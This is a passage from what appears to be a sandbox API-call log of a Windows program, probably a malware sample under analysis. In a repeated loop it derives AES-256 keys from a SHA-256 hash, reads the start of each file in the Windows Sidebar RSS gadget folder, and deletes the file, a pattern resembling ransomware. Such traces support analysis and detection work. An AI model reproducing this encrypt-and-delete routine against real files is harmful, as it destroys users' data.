phKey=0x326b254*=0x284d528) returned 1 [0191.627] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1d07 [0191.627] ReadFile (in: hFile=0x584, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0191.630] CryptDestroyHash (hHash=0x284d668) returned 1 [0191.630] CryptDestroyKey (hKey=0x284d528) returned 1 [0191.630] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0191.631] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\icon.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\rssfeeds.gadget\\icon.png")) returned 0 [0191.637] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0191.638] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0191.638] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0191.638] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0191.638] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0191.638] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1369 [0191.638] ReadFile (in: hFile=0x584, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0191.641] CryptDestroyHash (hHash=0x284d528) returned 1 [0191.641] CryptDestroyKey (hKey=0x284d668) returned 1 [0191.641] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0191.642] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\16-on-black.gif" (normalized: "c:\\program files\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\16-on-black.gif")) returned 0 [0191.642] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0191.643] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0191.643] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0191.643] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0191.643] GetFileSize (in: hFile=0x5b0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x125 [0191.643] ReadFile (in: hFile=0x5b0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0191.645] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0191.645] CryptDestroyKey (hKey=0x284d668) returned 1 [0191.645] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0191.646] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonDown_Off.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\buttondown_off.png")) returned 0 [0191.647] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0191.648] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0191.648] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0191.648] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0191.648] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1cf [0191.648] ReadFile (in: hFile=0x584, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0191.649] CryptDestroyHash (hHash=0x284d528) returned 1 [0191.649] CryptDestroyKey (hKey=0x284d668) returned 1 [0191.649] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0191.651] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonDown_On.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\buttondown_on.png")) returned 0 [0191.651] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0191.652] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0191.652] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0191.652] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0191.652] GetFileSize (in: hFile=0x5b0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x118 [0191.652] ReadFile (in: hFile=0x5b0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0191.653] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0191.653] CryptDestroyKey (hKey=0x284d668) returned 1 [0191.653] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0191.654] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonUp_Off.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\buttonup_off.png")) returned 0 [0191.655] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0191.656] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0191.656] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0191.656] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0191.656] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1c3 [0191.656] ReadFile (in: hFile=0x584, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0191.658] CryptDestroyHash (hHash=0x284d528) returned 1 [0191.658] CryptDestroyKey (hKey=0x284d668) returned 1 [0191.658] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0191.659] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonUp_On.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\buttonup_on.png")) returned 0 [0191.659] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0191.660] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0191.660] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0191.660] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0191.660] GetFileSize (in: hFile=0x5b0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x112b [0191.660] ReadFile (in: hFile=0x5b0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0191.665] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0191.665] CryptDestroyKey (hKey=0x284d668) returned 1 [0191.665] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0191.666] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\flyoutBack.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\flyoutback.png")) returned 0 [0191.667] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0191.667] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0191.667] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0191.667] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0191.667] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xfc [0191.668] ReadFile (in: hFile=0x584, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0191.669] CryptDestroyHash (hHash=0x284d528) returned 1 [0191.669] CryptDestroyKey (hKey=0x284d668) returned 1 [0191.669] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0191.670] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\item_hover_docked.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\item_hover_docked.png")) returned 0 [0191.797] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0191.798] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0191.798] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0191.798] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0191.798] GetFileSize (in: hFile=0x5b0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xba3 [0191.798] ReadFile (in: hFile=0x5b0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0191.806] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0191.806] CryptDestroyKey (hKey=0x284d668) returned 1 [0191.806] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0191.807] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\item_hover_floating.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\item_hover_floating.png")) returned 0 [0191.808] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0191.808] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0191.808] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0191.808] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0191.808] GetFileSize (in: hFile=0x5b4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xb6e [0191.809] ReadFile (in: hFile=0x5b4, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0191.810] CryptDestroyHash (hHash=0x284d528) returned 1 [0191.811] CryptDestroyKey (hKey=0x284d668) returned 1 [0191.811] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0191.812] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\item_hover_flyout.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\item_hover_flyout.png")) returned 0 [0191.812] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0191.813] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0191.813] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0191.813] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0191.813] GetFileSize (in: hFile=0x5b0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xcaa [0191.813] ReadFile (in: hFile=0x5b0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0191.815] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0191.815] CryptDestroyKey (hKey=0x284d668) returned 1 [0191.815] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0191.817] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\navBack.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\navback.png")) returned 0 [0191.817] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0191.818] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0191.818] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0191.818] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0191.818] GetFileSize (in: hFile=0x5b4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x175c [0191.818] ReadFile (in: hFile=0x5b4, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0191.821] CryptDestroyHash (hHash=0x284d528) returned 1 [0191.821] CryptDestroyKey (hKey=0x284d668) returned 1 [0191.821] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0191.822] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\rssBackBlue_docked.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\rssbackblue_docked.png")) returned 0 [0191.823] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0191.823] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0191.823] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0191.823] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0191.823] GetFileSize (in: hFile=0x5b0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x22ee [0191.823] ReadFile (in: hFile=0x5b0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0191.826] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0191.826] CryptDestroyKey (hKey=0x284d668) returned 1 [0191.826] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0191.828] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\rssBackBlue_Undocked.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\rssbackblue_undocked.png")) returned 0 [0191.829] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0191.829] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0191.829] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0191.829] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0191.829] GetFileSize (in: hFile=0x5b4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6a0 [0191.829] ReadFile (in: hFile=0x5b4, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0191.831] CryptDestroyHash (hHash=0x284d528) returned 1 [0191.831] CryptDestroyKey (hKey=0x284d668) returned 1 [0191.831] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0191.833] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\rssLogo.gif" (normalized: "c:\\program files\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\rsslogo.gif")) returned 0 [0191.833] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0191.833] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0191.833] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0191.834] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0191.834] GetFileSize (in: hFile=0x5b0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xb8d [0191.834] ReadFile (in: hFile=0x5b0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0191.877] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0191.877] CryptDestroyKey (hKey=0x284d668) returned 1 [0191.877] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0191.878] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\rss_headline_glow_docked.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\rss_headline_glow_docked.png")) returned 0 [0191.922] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0191.923] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0191.923] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0191.923] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0191.923] GetFileSize (in: hFile=0x5b4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xbb7 [0191.923] ReadFile (in: hFile=0x5b4, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0191.925] CryptDestroyHash (hHash=0x284d528) returned 1 [0191.925] CryptDestroyKey (hKey=0x284d668) returned 1 [0191.925] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0191.927] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\rss_headline_glow_floating.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\rss_headline_glow_floating.png")) returned 0 [0192.078] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0192.078] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0192.078] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0192.078] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0192.078] GetFileSize (in: hFile=0x5b0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4f2 [0192.079] ReadFile (in: hFile=0x5b0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0192.081] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0192.081] CryptDestroyKey (hKey=0x284d668) returned 1 [0192.081] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0192.084] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\rss_headline_glow_flyout.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\rss_headline_glow_flyout.png")) returned 0 [0192.085] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0192.086] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0192.086] CryptHashData (hHash=0x284d5e8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0192.086] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0192.086] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1816 [0192.086] ReadFile (in: hFile=0x5ac, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0192.089] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0192.089] CryptDestroyKey (hKey=0x284d528) returned 1 [0192.090] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0192.091] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\logo.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\rssfeeds.gadget\\logo.png")) returned 0 [0192.092] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0192.100] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0192.100] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0192.100] CryptHashData (hHash=0x284d668, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0192.100] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0192.100] GetFileSize (in: hFile=0x5b4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x7575 [0192.100] ReadFile (in: hFile=0x5b4, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0192.123] CryptDestroyHash (hHash=0x284d668) returned 1 [0192.123] CryptDestroyKey (hKey=0x284d528) 